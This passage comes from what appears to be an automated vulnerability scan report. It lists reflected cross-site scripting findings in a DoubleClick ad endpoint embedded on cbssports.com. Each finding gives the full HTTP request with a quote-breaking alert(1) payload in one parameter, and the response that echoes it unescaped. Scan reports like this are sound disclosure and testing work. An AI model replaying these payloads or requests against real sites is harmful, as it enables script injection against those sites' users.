Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=86d72"-alert(1)-"3044e5f3dbb&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
va
...[SNIP]...

3.59. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9555"-alert(1)-"c8daeff0702 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=c9555"-alert(1)-"c8daeff0702 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6942
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:11:12 GMT
Expires: Wed, 27 Apr 2011 22:11:12 GMT



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
p=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=c9555"-alert(1)-"c8daeff0702http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "
...[SNIP]...

3.60. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59da1"-alert(1)-"eaf124f5b59 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn59da1"-alert(1)-"eaf124f5b59&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:01:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn59da1"-alert(1)-"eaf124f5b59&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.
...[SNIP]...

3.61. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 775c5"-alert(1)-"994e6e2c419 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US775c5"-alert(1)-"994e6e2c419&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:03:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
6%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US775c5"-alert(1)-"994e6e2c419&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht
...[SNIP]...

3.62. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84197"-alert(1)-"7be177ce9c5 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240884197"-alert(1)-"7be177ce9c5&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240884197"-alert(1)-"7be177ce9c5&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.
...[SNIP]...

3.63. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8102d"-alert(1)-"fa280264549 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a8102d"-alert(1)-"fa280264549&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:00:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
7/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a8102d"-alert(1)-"fa280264549&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193
...[SNIP]...

3.64. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9bd0"-alert(1)-"79bd7310a71 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=b9bd0"-alert(1)-"79bd7310a71&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=b9bd0"-alert(1)-"79bd7310a71&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl
...[SNIP]...

3.65. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45e"-alert(1)-"e197175aae8 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.comce45e"-alert(1)-"e197175aae8&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.comce45e"-alert(1)-"e197175aae8&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");

...[SNIP]...

3.66. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201c0"-alert(1)-"1c5f71daa33 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2201c0"-alert(1)-"1c5f71daa33&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:01:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2201c0"-alert(1)-"1c5f71daa33&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&
...[SNIP]...

3.67. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfa2"-alert(1)-"617b1722fc6 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.comebfa2"-alert(1)-"617b1722fc6&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.comebfa2"-alert(1)-"617b1722fc6&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

3.68. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd5ca"-alert(1)-"c31bbc784d7 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuAcd5ca"-alert(1)-"c31bbc784d7&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:10:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuAcd5ca"-alert(1)-"c31bbc784d7&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.69. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pid parameter] previous next

Summary

